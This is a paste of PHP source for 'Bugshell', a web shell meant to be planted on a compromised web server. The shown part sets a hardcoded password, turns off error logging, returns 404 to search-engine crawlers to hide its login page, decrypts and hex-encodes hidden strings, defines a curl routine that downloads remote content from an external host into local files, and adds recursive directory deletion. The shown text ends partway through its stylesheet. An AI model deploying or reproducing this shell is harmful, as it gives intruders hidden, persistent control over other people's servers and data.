The text below is selected, press Ctrl+C to copy to your clipboard. (⌘+C on Mac) No line numbers will be copied.
Guest
Bbb
By Guest on 17th August 2018 07:59:24 AM | Syntax: TEXT | Views: 1



New paste | Download | Show/Hide line no. | Copy text to clipboard
  1. <?php
  2. /*! Description & About
  3.                 * Bugshell V.1
  4.                 * Responsive Version
  5.                 * Source Viewer With Syntax Highligting
  6.                 * Simple Alert
  7.                 * Without Log's
  8.                 * Clean Url
  9.                 * Paralax Cover
  10.                 * Programmed By Wildan Izzudin
  11.                 * Web Shell (c) 2017
  12.                 * Fix On 17, Dec 2017 (Sunday)
  13. End !*/
  14. error_reporting(0);
  15. ob_start("ob_gzhandler");
  16. // --- pass : underxploit --- //
  17. $pass = "0bdec2f837ad15748be105faaf60db68";
  18. $_POST = cl($_POST);
  19. $_GET = cl($_GET);
  20. $_COOKIE = cl($_COOKIE);
  21. $_COEG = array_merge($_POST, $_GET);
  22. $_COEG = array_map("xp", $_COEG);
  23. $cookie = md5($_SERVER['HTTP_USER_AGENT']);
  24. if(!isset($_COOKIE['BUGSHELL'])) {
  25. vb('BUGSHELL', $cookie);
  26. }
  27. function vb($k, $v) {
  28.     $_COOKIE[$k] = $v;
  29.     setcookie($k, $v);
  30. }
  31. function mtr($y) {
  32.         vars('<meta http-equiv="refresh" content="1;url='.$y.'"/>');
  33.         return $y;
  34. }
  35. function op($d, $e) {
  36.         $fp = fopen($d, "w");
  37.         $ch = curl_init();
  38.                   curl_setopt($ch, CURLOPT_URL, $e);
  39.                   curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  40.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  41.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  42.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  43.                   curl_setopt($ch, CURLOPT_FILE, $fp);
  44.         return curl_exec($ch);
  45.                   curl_close($ch);
  46.         fclose($fp);
  47.         ob_flush();
  48.         flush();
  49. }
  50. function deledir($dirname) {
  51.          if (is_dir($dirname))
  52.            $dir_handle = opendir($dirname);
  53.          if (!$dir_handle)
  54.               return false;
  55.          while($file = readdir($dir_handle)) {
  56.                if ($file != "." && $file != "..") {
  57.                     if (!is_dir($dirname."/".$file))
  58.                          unlink($dirname."/".$file);
  59.                     else
  60.                          deledir($dirname.'/'.$file);
  61.                }
  62.          }
  63.          closedir($dir_handle);
  64.          rmdir($dirname);
  65.          return true;
  66. }
  67. function a($x17) {
  68. @define("x13", "\x31\x33\x33\x37", true);
  69. $x14 = base64_decode($x17);
  70. $x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
  71. $x19 = rtrim(
  72.     mcrypt_decrypt(
  73.         MCRYPT_RIJNDAEL_128,
  74.         hash('sha256', x13, true),
  75.         substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
  76. return $x19;
  77. }
  78. function x($b) {
  79.         $c = a($b);
  80. return $c;
  81. }
  82. function vars($x) {
  83.         echo $x;
  84. }
  85. @ini_set('error_log',NULL);
  86. @ini_set('log_errors',0);
  87. @ini_set('html_errors',0);
  88. @ini_set('max_execution_time',0);
  89. @ini_set('file_uploads',1);
  90. @set_time_limit(0);
  91. @clearstatcache();
  92. @define("x4", "http://underxploit.esy.es/bug/", true);
  93. @define("x5", "\x64\x69\x72\x3d", true);
  94. @define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
  95. @define("x6", "\x66\x69\x6c\x65\x3d", true);
  96. @define("x9", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
  97. @define("sec", $pass, true);
  98. if(isset($_COEG['dir'])) {
  99.                 $dir = str_replace("\\", "/", $_COEG['dir']);
  100.                 @chdir($dir);
  101.         } else {
  102.                 $dir = str_replace("\\", "/", getcwd());
  103. }
  104. $dir = str_replace("\\","/", $dir);
  105. $scdir = explode("/", $dir);        
  106. function cl($arr){
  107.         $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
  108. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
  109.                 if(is_array($arr)){
  110.                         foreach($arr as $k=>$v){
  111.                                 if(is_array($v)) $arr[$k] = cl($v);
  112.                                 else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
  113.                         }
  114.                 }
  115.         }
  116.         return $arr;
  117. }
  118. function xp($str){
  119.         return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
  120. }
  121. function r($r) {
  122.         vars('<script>window.location = "'.$r.'";</script>');
  123.         return $r;
  124. }
  125. function s($s) {
  126.         echo 'notif({
  127.                                 type: "default",
  128.                                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$s.'</font>",
  129.                                 width: "all",
  130.                                 height: 100,
  131.                                 position: "center",
  132.                         });';
  133.         return $s;
  134. }
  135. function error($text) {
  136. echo '<script> notif({
  137.                                 type: "default",
  138.                                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
  139.                                 width: "all",
  140.                                 height: 100,
  141.                                 position: "center",
  142.                         });</script>';
  143. return $text;
  144. }
  145. function success($text) {
  146. echo '<script> notif({
  147.                                 type: "default",
  148.                                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
  149.                                 width: "all",
  150.                                 height: 100,
  151.                                 position: "center",
  152.                         });</script>';
  153. return $text;
  154. }
  155. if(get_magic_quotes_gpc()) {
  156.     function stripslashes_array($array) {
  157.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  158. }
  159.     $_COEG = stripslashes_array($_COEG);
  160.     $_COOKIE = stripslashes_array($_COOKIE);
  161. }
  162. if(!empty(sec)) {
  163.     if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec))         vb('BUGSHELL', sec);
  164. if(!isset($_COOKIE['BUGSHELL']) || ($_COOKIE['BUGSHELL'] != sec))
  165.         login();
  166. }
  167. function login() {
  168. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  169.         $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  170.           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  171.           header('HTTP/1.0 404 Not Found');
  172.           exit;
  173.      }
  174.  } die('<!DOCTYPE html><html><head>
  175. <title>LOGIN | BUGSHELL</title> <meta name="robots" content="noindex, nofollow, noarchive"> <meta name="viewport" content="width=device-width, initial-scale=1">
  176. <link href="data:image/x-icon;base64,AAABAAEAEBAAAAAAAABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAACFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYX/hYWF/4WFhf+FhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYX/hYWFsYWFhbGFhYWxhYWFsYWFhf+FhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhQCFhYX/hYWFsf///4f///+H////h////4eFhYWxhYWF/4WFhQCFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhbGFhYX/hYWF/////4eFhYX/hYWF/4WFhf+FhYX/////h4WFhf+FhYX/hYWFsYWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhf////+H////h////4f///+H////h////4eFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhf+FhYX/////h4WFhf+FhYX/hYWF/4WFhf////+HhYWF/4WFhf+FhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/////4f///+H////h////4f///+H////h4WFhf+FhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYWxhYWF/4WFhf////+H////h////4f///+H////h////4eFhYX/hYWF/4WFhbGFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhQCFhYX/hYWFsf///4f///+H////h////4eFhYWxhYWF/4WFhQCFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhf+FhYWxhYWFsYWFhbGFhYWxhYWF/4WFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhf+FhYX/hYWF/4WFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUA//8AAP//AAD//wAA/D8AAPgfAADQCwAAwAMAAPAPAADAAwAA8A8AAMADAADQCwAA+B8AAPw/AAD//wAA//8AAA==" rel="icon" type="image/x-icon" /><meta property="og:image" content="https://1.bp.blogspot.com/-BcG4JeX2z6Q/WVYTMixgLvI/AAAAAAAAAmk/PBjmcF02SWgoiP-KcxvWq6QVDV2DACi0QCLcBGAs/s320/PicsArt_06-30-03.52.49.jpg"><meta name="theme-color" content="#222"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="#222"><meta name="msapplication-navbutton-color" content="#222"><meta name="author" content="WILDAN IZZUDIN">
  177. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
  178. <style>
  179. @import url("https://fonts.googleapis.com/css?family=Cabin");
  180. *{
  181.         box-sizing: border-box;
  182. }
  183. *:focus {
  184.     outline: 0;
  185. }
  186. body {
  187.                 font-size: 14px;
  188.         color:#fff;
  189.         margin:auto;
  190.         font-family: "Cabin";
  191.         background:#191919;
  192.         text-shadow:0px 0px 0px #343436;
  193. }
  194. .btn-exe {
  195.         background:#343436;
  196.         color:#fff;
  197.         font-family: "Cabin";
  198.         padding:6px;
  199.         border:1px solid #343436;
  200.         width:100%;
  201.         font-size:13px;
  202. }
  203. .login-container {
  204.         max-width: 450px;
  205.         margin: auto;
  206.         overflow: auto;
  207.     background:none;
  208. }
  209. .login-kepala {
  210.         background:#262624;
  211.         padding:10px;
  212.         color:#fff;
  213.         font-size:17px;
  214.         position:fixed;z-index:1024;top:0;left:0;right:0;
  215.         box-shadow:0px 0px 3px #111;
  216.         font-family: "Cabin";
  217. }
  218. input[type=password] {
  219.         border:1px solid #343436;
  220.         padding:8px;
  221.         background: #1D1D1D;
  222.         color:#fff;
  223.         font-family: "Cabin";
  224.         width:100%;
  225.         font-size:14px;
  226. }
  227. .btn-exe:hover {
  228.         background:none;
  229.         border:1px solid #343436;
  230.         -webkit-transition: all 0.3s;
  231.    -moz-transition: all 0.3s;
  232.     transition: all 0.3s;
  233. }
  234. table {
  235.         width: 100%;
  236. }
  237. @media screen and (max-width: 1024px) {
  238. .btn-exe {
  239.         background:#343436;
  240.         color:#fff;
  241.         font-family: "Cabin";
  242.         padding:7px;
  243.         border:1px solid #343436;
  244.         width:100%;
  245.         font-size:13px;
  246.     }  
  247. }
  248. @media screen and (max-width: 780px) {
  249. .btn-exe {
  250.         background:#343436;
  251.         color:#fff;
  252.         font-family: "Cabin";
  253.         padding:7px;
  254.         border:1px solid #343436;
  255.         width:100%;
  256.         font-size:14px;
  257.    }
  258. }
  259. </style>
  260. </head><body><div class="login-kepala">
  261. <div class="login-container"><form action="" method="post"><table><td align="center" style="width:10%"><i class="fa fa-bug"></i></td><td style="width:70%"><input type="password" name="pass" style="padding:7px"> </td><td style="text-align:right;width:20%"><button type="submit" class="btn-exe"><i class="fa fa-sign-in"></i></button></td></table></form></div></div></body></html>');
  262. }
  263. ?>
  264. <?php
  265. vars('<!DOCTYPE HTML>
  266. <html lang="id">
  267. <head><title>BUGSHELL</title>
  268. <link href="data:image/x-icon;base64,AAABAAEAEBAAAAAAAABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAACFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYX/hYWF/4WFhf+FhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYX/hYWFsYWFhbGFhYWxhYWFsYWFhf+FhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhQCFhYX/hYWFsf///4f///+H////h////4eFhYWxhYWF/4WFhQCFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhbGFhYX/hYWF/////4eFhYX/hYWF/4WFhf+FhYX/////h4WFhf+FhYX/hYWFsYWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhf////+H////h////4f///+H////h////4eFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhf+FhYX/////h4WFhf+FhYX/hYWF/4WFhf////+HhYWF/4WFhf+FhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/////4f///+H////h////4f///+H////h4WFhf+FhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYWxhYWF/4WFhf////+H////h////4f///+H////h////4eFhYX/hYWF/4WFhbGFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhQCFhYX/hYWFsf///4f///+H////h////4eFhYWxhYWF/4WFhQCFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhf+FhYWxhYWFsYWFhbGFhYWxhYWF/4WFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhf+FhYX/hYWF/4WFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUA//8AAP//AAD//wAA/D8AAPgfAADQCwAAwAMAAPAPAADAAwAA8A8AAMADAADQCwAA+B8AAPw/AAD//wAA//8AAA==" rel="icon" type="image/x-icon" />
  269. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
  270. <meta property="og:image" content="/code/img/logo.jpg">
  271.         <meta name="theme-color" content="#222">
  272.         <meta name="apple-mobile-web-app-capable" content="yes">
  273.         <meta name="apple-mobile-web-app-status-bar-style" content="#222">
  274.         <meta name="msapplication-navbutton-color" content="#222">
  275.         <meta name="author" content="WILDAN IZZUDIN">
  276. <style>
  277. @import url("https://fonts.googleapis.com/css?family=Cabin");
  278. *{
  279.         box-sizing: border-box;
  280. }
  281. *:focus {
  282.     outline: 0;
  283. }
  284. body {
  285.                 font-size: 14px;
  286.         color:#fff;
  287.         margin:auto;
  288.         font-family: "Cabin";
  289.         background:#191919;
  290.         text-shadow:0px 0px 0px #343436;
  291. }
  292. ::selection {
  293.     background-color: rgba(201,223,255,0.2);
  294.     color: #ffffff;
  295. }
  296. ::-moz-selection {
  297.     background-color: rgba(201,223,255,0.1);
  298.     color: #ffffff;
  299. }
  300. hr {
  301.         border: 0;
  302.         height: 1px;
  303.         background-image: -webkit-linear-gradient(left, #343436, #343436, #343436);
  304.         background-image: -moz-linear-gradient(left, #343436, #343436, #343436);
  305.         background-image: -ms-linear-gradient(left, #343436, #343436, #343436);
  306.         background-image: -o-linear-gradient(left, #343436, #343436, #343436);
  307. }
  308. code {
  309.         font-family: "Cabin";
  310.         word-wrap: break-word;
  311.         background:none;
  312. }
  313. pre {
  314.         margin:0px;
  315.         border:1px solid #343436;
  316.         white-space: pre-wrap;
  317.     white-space: -moz-pre-wrap;
  318.     white-space: -pre-wrap;
  319.     white-space: -o-pre-wrap;
  320.     word-wrap: break-word;  
  321. }
  322. .co {
  323.     margin:auto;
  324.     max-width:300px;
  325. }
  326. .a:hover {
  327.         color:#1D9D73;
  328.         -webkit-transition: all 0.3s;
  329.    -moz-transition: all 0.3s;
  330.     transition: all 0.3s;
  331. }
  332. .mainc {
  333.         color: #1D9D73;
  334. }
  335. .coL-option {
  336.         padding:5px;
  337.         border:1px solid #343436;
  338.         margin-top:5px;
  339.         background:none;
  340. }
  341. .coL-btn-option-active {
  342.         padding:5px;
  343.         background: #343436;
  344.         border:1px solid #343436;
  345.         font-size:16px;
  346.         font-family: "Cabin";
  347.         width:100%;
  348.         color:#fff;
  349. }
  350. .coL-btn-option {
  351.         padding:5px;
  352.         background: none;
  353.         border:1px solid #343436;
  354.         font-size:16px;
  355.         font-family: "Cabin";
  356.         width:100%;
  357.         color:#fff;
  358. }
  359. .coL-btn-option:hover {
  360.         background: #343436;
  361.         width:100%;
  362.         -webkit-transition: all 0.3s;
  363.    -moz-transition: all 0.3s;
  364.     transition: all 0.3s;
  365. }
  366. .coL-option-panel {
  367.         padding:5px;
  368.         border:none;
  369.         background:#343436;
  370. }
  371. th {
  372.         font-weight: normal;
  373.         font-size: 15px;
  374. }
  375. .btn-exe {
  376.         background:#343436;
  377.         color:#fff;
  378.         font-family: "Cabin";
  379.         padding:6px;
  380.         border:1px solid #343436;
  381.         width:100%;
  382.         font-size:13px;
  383. }
  384. textarea {
  385.         border: 1px solid #343436;
  386.         width: 100%;
  387.         height: 487px;
  388.         padding: 5px;
  389.         background: #1D1D1D;
  390.         color: #ffffff;
  391.         font-family: "Cabin";
  392.     font-size: 13px;
  393. }
  394. select {
  395.     cursor:pointer;
  396.         padding:6px;
  397.         border:1px solid #343436;
  398.         font-family: "Cabin";
  399.         font-size:14px;
  400.         background: #1D1D1D;
  401.         width:100%;
  402.     color: #fff;
  403.     -webkit-transition: all 0.5s;
  404.     -moz-transition: all 0.5s;
  405.      transition: all 0.5s;
  406. }
  407. .php {
  408.         font-size: 13px;
  409. }
  410. .td-md5 {
  411.         border-right:1px solid #1D9D73;
  412.         padding:6px;
  413. }
  414. .login-container {
  415.         max-width: 450px;
  416.         margin: auto;
  417.         overflow: hidden;
  418.     background:none;
  419. }
  420. .login-kepala {
  421.         background:#262624;
  422.         padding:10px;
  423.         color:#fff;
  424.         font-size:17px;
  425.         position:fixed;z-index:1024;top:0;left:0;right:0;
  426.         box-shadow:0px 0px 3px #111;
  427.         font-family: "Cabin";
  428. }
  429. .dir {
  430.         background:#1D1D1D;
  431.         padding:2px;
  432.         margin-left:2px;
  433.         margin-right:2px;
  434.         margin-top:3px;
  435.         margin-bottom:1px;
  436. }
  437. .dir-pallet {
  438.         background:#343436;
  439.         padding:6px;
  440.         text-align:left;
  441. }
  442. .dir-td-left {
  443.         width:50px;
  444.         border-right:1px solid #1D9D73;
  445.         font-size: 14px;
  446. }
  447. .dir-td-right {
  448.         padding-left:5px;
  449.         font-size: 15px;
  450. }
  451. .tools-content {
  452.         padding:3px;
  453.         margin-top:5px;
  454.         background:none;
  455.         border:1px solid #343436;
  456. }
  457. .td-tools-left {
  458.         padding:7px;
  459.         width:30px;
  460.         text-align:center;
  461. }
  462. .td-tools-icon {
  463.         width:50px;
  464.         background:none;
  465.         text-align:center;
  466. }
  467. .td-tools-content {
  468.         padding-left:5px;
  469. }
  470. .ex-hov:hover {
  471.         background:rgba(52, 52, 54, 0.3);
  472.         -webkit-transition: all 0.3s;
  473.    -moz-transition: all 0.3s;
  474.     transition: all 0.3s;
  475. }
  476. .kepala {
  477.         background:#343436;
  478.         padding:7px;
  479.         color:#fff;
  480.         font-size:15px;
  481.         position:fixed;z-index:1024;top:0;left:0;right:0;
  482.         box-shadow:0px 0px 3px #111;
  483.         font-family: "Cabin";
  484. }
  485. .co-ontainer {
  486.         max-width: 820px;
  487.         margin: auto;
  488.         overflow: hidden;
  489.     background:none;
  490. }
  491. .co-ontainer-2 {
  492.         max-width: 820px;
  493.         margin: auto;
  494.         overflow: hidden;
  495.     background:#232326;
  496.     margin-top:50px;
  497. }
  498. table {
  499.         width:100%;
  500. }
  501. .td-panel {
  502.         background: #343436;
  503.         padding:5px;
  504.         width:40px;
  505.         text-align:center;
  506. }
  507. .td-panel-right {
  508.         padding-left:3px;
  509.         font-size: 14px;
  510. }
  511. .wrap {
  512.         word-wrap: break-word;  
  513. }
  514. .break {
  515.         word-break: break-all;
  516.     white-space: normal;
  517. }
  518. .btn-dark:hover {
  519.         color:#4B81AA;
  520.         }
  521. .coL-panel {
  522.         padding:1px;
  523.         border:1px solid #343436;
  524.         color:#fff;
  525.         background:none;
  526.  }
  527. .coR-panel {
  528.         padding:1px;
  529.         border:1px solid #343436;
  530.         color:#fff;
  531.         background:none;
  532.  }
  533.  .footer {
  534.         background:#343436;
  535.         color:#fff;
  536.         padding:8px;
  537.         text-align:center;
  538.         margin-top:2px;
  539.  }
  540.  .btn-nav {
  541.     background:rgba(0,0,0,0.3);
  542.     padding:6px;
  543.     color:#fff;
  544.         font-size:14px;
  545.         font-family: "Cabin";
  546.         width:100%;
  547.         border:none;
  548.         font-weight:normal;
  549. }
  550. .btn-nav:hover {
  551.         background:#343436;
  552.         -webkit-transition: all 0.3s;
  553.    -moz-transition: all 0.3s;
  554.     transition: all 0.3s;
  555. }
  556. .table-info {
  557.         margin-top:3px;
  558.         border-collapse:collapse;
  559.         font-family: "Cabin";
  560. }
  561. .th-info {
  562.         padding:6px;
  563.         border:1px solid #343436;
  564.         background:#343436;
  565.         border-collapse:collapse;
  566.         font-family: "Cabin";
  567. }
  568. .td-info {
  569.         padding:7px;
  570.         border:1px solid #343436;
  571.         background:none;
  572.         border-collapse:collapse;
  573.         font-family: "Cabin";
  574. }
  575. .table-file {
  576.         margin-top:3px;
  577.         border-collapse:collapse;
  578.         font-family: "Cabin";
  579. }
  580. .th-file {
  581.         padding:6px;
  582.         border:1px solid #343436;
  583.         background:#343436;
  584.         border-collapse:collapse;
  585.         font-family: "Cabin";
  586. }
  587. .td-file {
  588.         padding:4px;
  589.         border:1px solid #343436;
  590.         background:none;
  591.         border-collapse:collapse;
  592.         font-family: "Cabin";
  593. }
  594. .label-danger {
  595.         color:#FF0000;
  596. }
  597. .label-default {
  598.         color:#1D9D73;
  599. }
  600. .label-success {
  601.         color:#1D9D73;
  602. }
  603. .top {
  604.         margin-top:5px;
  605. }
  606. input[type=text] {
  607.         border:1px solid #343436;
  608.         padding:7px;
  609.         background: #1D1D1D;
  610.         color:#fff;
  611.         font-family: "Cabin";
  612.         width:100%;
  613.         font-size:14px;
  614. }
  615. input[type=password] {
  616.         border:1px solid #343436;
  617.         padding:8px;
  618.         background: #1D1D1D;
  619.         color:#fff;
  620.         font-family: "Cabin";
  621.         width:100%;
  622.         font-size:14px;
  623. }
  624. input[type=file] {
  625.         border:1px solid #343436;
  626.         color:trasparent;
  627.         background: #1D1D1D;
  628.         width:100%;
  629.         font-size:12px;
  630.         padding:4px;
  631.         font-family: "Cabin";
  632. }
  633. .alert {
  634.         font-family: "Cabin";
  635. }
  636. .btn-exe:hover {
  637.         background:none;
  638.         border:1px solid #343436;
  639.         -webkit-transition: all 0.3s;
  640.    -moz-transition: all 0.3s;
  641.     transition: all 0.3s;
  642. }
  643. .nav {
  644.         background: #303030;
  645.         color:#fff;
  646.         width:30px;
  647.         height:30px;
  648.         padding:5px;
  649.         border:none;
  650.         border-radius:100%;
  651.         box-shadow: 2px 2px 2px rgba(0,0,0,0.3) inset;
  652. }
  653. .nav:hover {
  654.    background: #1D9D73;
  655.   transition: all 0.5s ease-in-out;
  656.   color: #fff;
  657.  }
  658. /* Main */
  659. .cover {
  660.         background:url(\'https://3.bp.blogspot.com/-ypxBvzFNdSg/WjXR2E-mUZI/AAAAAAAAAvo/bXIHf3enhBck-rd1NoYhAgnJPqOZhljRgCLcBGAs/s1600/cov.jpg\') fixed;
  661.         background-size:100% 125%;
  662.         padding-top:250px;
  663.         padding-bottom:5px;
  664.         padding-left:5px;
  665.         padding-right:5px;
  666.         border:0px solid #1D1D1D;
  667. }
  668.         .coL {
  669.                 width: 469px;
  670.                 border: 0px solid #343436;
  671.                 background: #1D1D1D;
  672.                 padding: 5px;
  673.                 float: left;
  674.         margin-left:2px;
  675.                 margin-right:2px;
  676.                 margin-bottom:2px;
  677.                 margin-top:3px;
  678.         color:white;
  679.         }
  680.         .coR {
  681.                 width: 343px;
  682.                 border: 0px solid #343436;
  683.                 background: #1D1D1D;
  684.                 margin-left:2px;
  685.                 margin-right:2px;
  686.                 margin-bottom:2px;
  687.                 margin-top:3px;
  688.         padding: 5px;
  689.                 float: left;
  690.         }
  691. a {
  692.         text-decoration:none;
  693.         color:#fff;
  694. }
  695. .cookie-td {
  696.         width: 150px;
  697. }
  698. /* Design By Wildan Izzudin */
  699. @media screen and (max-width: 1024px) {
  700.        
  701.         .co-ontainer-2 {
  702.                 width: 100%;
  703.         }
  704.         .coL {
  705.                 width: 467px;
  706.                 background: none:
  707.         border: none;
  708.         margin-bottom:3px;
  709.         }
  710.         .coR {
  711.                 width: 42%;
  712.                 float: right;
  713.         }
  714.         .cookie-td {
  715.                 width: 150px;
  716.         }
  717.     .btn-exe {
  718.         background:#343436;
  719.         color:#fff;
  720.         font-family: "Cabin";
  721.         padding:7px;
  722.         border:1px solid #343436;
  723.         width:100%;
  724.         font-size:13px;
  725.     }  
  726.     input[type=file] {
  727.         border:1px solid #343436;
  728.         color:trasparent;
  729.         background: #1D1D1D;
  730.         width:100%;
  731.         font-size:12px;
  732.         padding:4px;
  733.         font-family: "Cabin";
  734.     }
  735. }
  736. @media screen and (max-width: 780px) {
  737.        
  738.         .header,
  739.         .cover {
  740.         background:url(\'https://3.bp.blogspot.com/-ypxBvzFNdSg/WjXR2E-mUZI/AAAAAAAAAvo/bXIHf3enhBck-rd1NoYhAgnJPqOZhljRgCLcBGAs/s1600/cov.jpg\');
  741.         background-size:100% 100%;
  742.         padding-top:160px;
  743.         padding-bottom:5px;
  744.         padding-left:5px;
  745.         padding-right:5px;
  746.         margin:3px;
  747. }
  748.         .coL {
  749.                 width: auto;
  750.                 float: none;
  751.         }
  752.         .coR {
  753.                 width: auto;
  754.                 float: none;
  755.         }
  756.         .cookie-td {
  757.                 width: 100px;
  758.         }
  759.     .btn-exe {
  760.         background:#343436;
  761.         color:#fff;
  762.         font-family: "Cabin";
  763.         padding:7px;
  764.         border:1px solid #343436;
  765.         width:100%;
  766.         font-size:14px;
  767.    }
  768.    input[type=file] {
  769.         border:1px solid #343436;
  770.         color:trasparent;
  771.         background: #1D1D1D;
  772.         width:100%;
  773.         font-size:12px;
  774.         padding:6px;
  775.         font-family: "Cabin";
  776. }
  777. }
  778.         .hljs{display:block;overflow-x:auto;padding:0.5em;background:#1D1D1D;color:#e6e1dc}
  779.         .hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}
  780.         .hljs-keyword,.hljs-selector-tag{color:#c26230}
  781.         .hljs-string,.hljs-number,.hljs-regexp,.hljs-variable,.hljs-template-variable{color:#a5c261}
  782.         .hljs-subst{color:#519f50}.hljs-tag,.hljs-name{color:#e8bf6a}
  783.         .hljs-type{color:#da4939}
  784.         .hljs-symbol,.hljs-bullet,.hljs-built_in,.hljs-builtin-name,.hljs-attr,.hljs-link{color:#6d9cbe}
  785.         .hljs-params{color:#d0d0ff}
  786.         .hljs-attribute{color:#cda869}
  787.         .hljs-meta{color:#9b859d}
  788.         .hljs-title,.hljs-section{color:#ffc66d}
  789.         .hljs-addition{background-color:#144212;color:#e6e1dc;display:inline-block;width:100%}
  790.         .hljs-deletion{background-color:#600;color:#e6e1dc;display:inline-block;width:100%}
  791.         .hljs-selector-class{color:#9b703f}
